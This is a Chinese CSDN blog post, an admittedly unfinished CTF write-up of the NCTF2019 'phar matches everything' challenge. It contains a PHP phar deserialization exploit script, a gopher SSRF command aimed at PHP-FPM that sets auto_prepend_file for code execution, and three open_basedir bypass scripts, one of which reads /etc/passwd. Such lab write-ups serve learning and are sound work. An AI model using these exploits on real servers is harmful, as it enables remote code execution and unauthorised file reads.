[NCTF2019]phar matches everything

最新推荐文章于 2022-08-14 17:02:17 发布
最新推荐文章于 2022-08-14 17:02:17 发布
阅读量358 收藏 2
点赞数 1
分类专栏: 刷题记录 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Little_jcak/article/details/124287214
版权

写在前面:这篇文章并没有把这道题目做出来,一直找不到内网提供PHP-FPM的主机ip,就一直卡在这个地方,目前自己的能力不够,还不能解决这道题;现在将这篇做题的记录发出来,记录学习过程,希望将来回过头来再做这道题的时候能得心应手

第一部分 phar反序列化+文件头和文件名检测绕过

buu平台上给的github源码链接失效了,直接看的wp,一个简单的pop链构造,然后利用phar反序列化

在这里插入图片描述

exp.php

<?php

class Easytest{
	protected $test = '1';
}
class Main{
	public $url="http://10.128.253.13";
}
//读/etc/hosts 发现不了内网ip
//需要读 /proc/net/arp
$a = new Easytest();
echo urlencode(serialize($a));
$b = new Main();
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER();?>");
$phar->addFromString("text.txt","text");
$phar->setMetadata($b);
$phar->stopBuffering();
rename("phar.phar","phar.gif");

第二部分 SSRF + gopher协议打fpm

1、首先了解fpm是什么,参考p神文章

  • FastCGI record 类似HTTP协议,作用对象是服务器的中间件与后端语言进行通信
  • FPM(FastCGI Process Manager 叫做FastCGI 进程管理器), FPM按照fastcgi的协议将TCP流解析成真正的数据
  • Nignx 会把用户请求变成 key-value对(环境变量),交付给FPM。php-fpm拿到fast-cgi的数据包,进行解析,执行 SCRIPT_FILENAME所指的文件

2、PHP-FPM未授权访问漏洞

  • security.limit_extensions配置(php_fpm),这个字段限定了只有某些特定文件才能被执行,默认是.php
  • 由于第一条的那个配置,想要利用未授权访问漏洞,必须找一个服务器上存在php文件,通过 find / -name "*.php"

3、PHP-FPM任意代码执行

​ 3.1、涉及到php.ini中两个有意思的配置

  • auto_prepend_file 用法:在执行目标文件之前,先包含这个字段指向的文件,如果设置为php://input,等于执行任何php文件前,都要包含post的内容,因此可以将待执行的代码放在body里
  • auto_append_file 用法:在执行目标完成之后,包含这个字段指向的文件

​ 3.2、涉及到PHP-FPM的两个环境变量,

  • PHP-VALUE 设置的模式包括PHP_INI_USERPHP_INI_ALL的选项

  • PHP-ADMIN-VALUE 除了disable_functions之外的所以选项

'PHP_VALUE': 'auto_prepend_file = php://input',
'PHP_ADMIN_VALUE': 'allow_url_include = On'

这个地方是个坑,还没找到内网的ip

找到开启fpm的ip,使用gopher脚本生成payload

python gopher.py 内网ip /var/www/html/index.php -p 9000 -c "<?php phpinfo();?>" -u

第三部分 绕过open_basedir的限制

1、首先open_basedir是什么

  • 字面意思,开放的基本路径,作为php.ini中的一个配置选项,将用户的活动区域限定在指定目录

  • open_basedir限制的是前缀,而不是目录名,在以下的文件夹和文件都可以访问

  • 若要限制仅在指定目录,需要用斜杠结束目录

    phpinfo中的core部分

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-397doUZ0-1650384937211)(images/Phar反序列化/image-20220419232020708.png)]

2、如何绕过open_basedir的限制

2.1、利用DirectoryIterator + Glob协议直接列举目录

代码如下:

<?php
printf('<b>open_basedir : %s </b><br />', ini_get('open_basedir'));
$file_list = array();
// normal files
$it = new DirectoryIterator("glob:///*");
foreach($it as $f) {
    $file_list[] = $f->__toString();
}
// special files (starting with a dot(.))
$it = new DirectoryIterator("glob:///.*");
foreach($it as $f) {
    $file_list[] = $f->__toString();
}
sort($file_list);
foreach($file_list as $f){
        echo "{$f}<br/>";
}
?>

2.2、利用ini_set读取文件内容

代码如下:

<?php
mkdir('tmpdir');
chdir('tmpdir');
ini_set('open_basedir','..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
ini_set('open_basedir','/');
$a=file_get_contents('/etc/passwd');
var_dump($a);
?>

//这里的chdir("..");数量据具体环境修改,一般要求是如果再chdir一次就进入根目录为止

2.3、软链接绕过

代码如下:

<?php
        mkdir("c");
        chdir("c");
        mkdir("d");
        chdir("d");
        chdir("..");
        chdir("..");
        symlink("c/d","tmplink");
        symlink("tmplink/../../1.txt","exploit");
        unlink("tmplink");
        mkdir("tmplink");
        echo file_get_contents("http://localhost/exploit");
?>
Y3pro
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSRF利用协议中的万金油——Gopher
qq_57172130的博客
08-07 7100
使用gopher协议进一步利用ssrf
python——Gopher协议的实现
sinat_34946888的博客
04-02 2130
《网络编程基础》第一章1.5.1.1基本客户端操作 Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。允许用户使用层叠结构的菜单与文件,以发现和检索信息,它拥有世界上最大、最神奇的编目。Gopher客户程序和Gopher服务器相连接,并能使用菜单结构显示其它的菜单、文档或文件,并索引。同时可通...
『CTF Web复现』BUUCTF-[NCTF2019]phar matches everything(自动化脚本获取flag)
Ho1aAs‘s Blog
09-07 1385
特点:自动化python脚本获取flag;利用点:unserialize反序列化;phar反序列化;添加图片头和更改MIME、后缀绕过文件上传检测;ssrf gopher协议打php-fpm;绕过open_basedir
BUUCTF:[NCTF2019]phar matches everything
末初的CSDN博客
07-28 1787
题目地址:https://buuoj.cn/challenges#[NCTF2019]phar%20matches%20everything 源码地址:https://github.com/swfangzhang/My-2019NCTF/tree/master/phar matches everything catchmime.php //catchmime.php <?php class Easytest{ protected $test; public function funn
gopher协议总结
unexpectedthing的博客
12-01 6183
定义 gopher协议是一种信息查0找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。利用此协议可以攻击内网的 Redis、Mysql、FastCGI、Ftp等等,也可以发送 GET、POST 请求。这拓宽了 SSRF 的攻击面 利用: 攻击内网的 Redis、Mysql、FastCGI、Ftp等等,也可以发送 GET、POST 请求
python 构造gopher payload
weixin_48266255的博客
08-14 324
python 构造gopher
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
H&NCTF 2024 Re 全解WP(带附件加详细解析)
最新发布
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
全国大学生电子设计大赛之历年.7z
09-19
全国大学生电子设计大赛历年题——从第一届到第十四届
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
常见未授权访问漏洞总结
sc_Pease的博客
12-25 2565
本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 常见的未授权访问漏洞: Redis 未授权访问漏洞 MongoDB 未授权访问漏洞 Jenkins 未授权访问漏洞 Memcached 未授权访问漏洞 JBOSS 未授权访问漏洞 VNC 未授权访问漏洞 Docker 未授权访问漏洞 ZooKeeper 未授权访问漏洞 Rsync 未授权访问漏洞 Atlassian Crowd 未授权访问漏洞 CouchDB 未授权访问漏洞 Elasticsearch 未授权访问漏洞 Hadoop
[BUUCTF]phar matches everything
Y4tacker的博客
09-07 373
文章目录写在前面脚本 写在前面 网上一堆水文章,看我脚本再理解下就行了,省略分析步骤 脚本 import os import time import random import sys from io import BytesIO import requests import base64 import re from urllib.parse import quote PY2 = True if sys.version_info.major == 2 else False def force_byt
关于phar反序列化——BUUCTF-[CISCN2019 华北赛区 Day1 Web1]Dropbox
silence1_的博客
10-22 2674
关于phar反序列化——[CISCN2019 华北赛区 Day1 Web1]Dropbox 先看看phar是啥https://blog.csdn.net/u011474028/article/details/54973571 简单的说,phar就是php的压缩文件,它可以把多个文件归档到同一个文件中,而且不经过解压就能被 php 访问并执行,与file:// ,php://等类似,也是一种流包装器...
『CTF Web复现』BUUCTF-[CISCN2019 华北赛区 Day1 Web1]Dropbox
Ho1aAs‘s Blog
09-08 902
利用点:任意文件读取;phar反序列化POP链读取文件;绕过MIME文件上传;任意文件删除;phar://协议触发反序列化
buuctf web小结
qq_42551635的博客
04-25 4566
你传你*呢 .htaccess文件 AddType application/x-httpd-php xxx 本句话的作用是使该.htaccess文件所在目录及其子目录中的后缀为.xxx的文件被Apache当做php文件 一个傻逼错误 var/www/html 是网站根目录,也就等价于 http://55f19d33-bd47-48ac-9734-232c1632f237.node3.buuoj.cn 所以蚁剑里链接时不能重复输入 题解 上传.htaccess文件(注意绕过MIME) 然后上传图片马 ,o
CTF gopher协议
a3320315的博客
11-03 7238
0x01 例题 这儿举例安恒的一道月题 tips:利用ssrf,gopher打内网 0x02 贴出代码 <?php highlight_file(__FILE__); $x = $_GET['x']; $pos = strpos($x,"php"); if($pos){ exit("denied"); } $ch = curl_init(); curl_setopt($ch,...
Gopher 应用实现步骤
yingyingol
10-19 233
下表显示了实现一个典型的gopher应用的步骤: 目的 方法 结果 开始一个gopher session 创建一个CInternetSession对象 初始化WinInet 并联接服务器 连接到一个gopher Server 用CInternetSession::GetGopherConnection 返回一个CGopherConnection对象 Find ...
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过不断尝试不同的字符,构造SQL语句进行盲注,判断是否成功绕过过滤。引用\[3\]提供了一个Python脚本的示例,可以用来自动化进行尝试。该脚本通过构造不同长度的payload,逐位尝试密码的每一位字符,直到获取到完整的密码。 #### 引用[.reference_title] - *1* [[NCTF2019]SQLi --BUUCTF --详解](https://blog.csdn.net/l2872253606/article/details/125265138)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[NCTF2019]SQLi(Regexp注入)](https://blog.csdn.net/weixin_45669205/article/details/116137824)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[NCTF2019]SQLi](https://blog.csdn.net/shinygod/article/details/124100832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值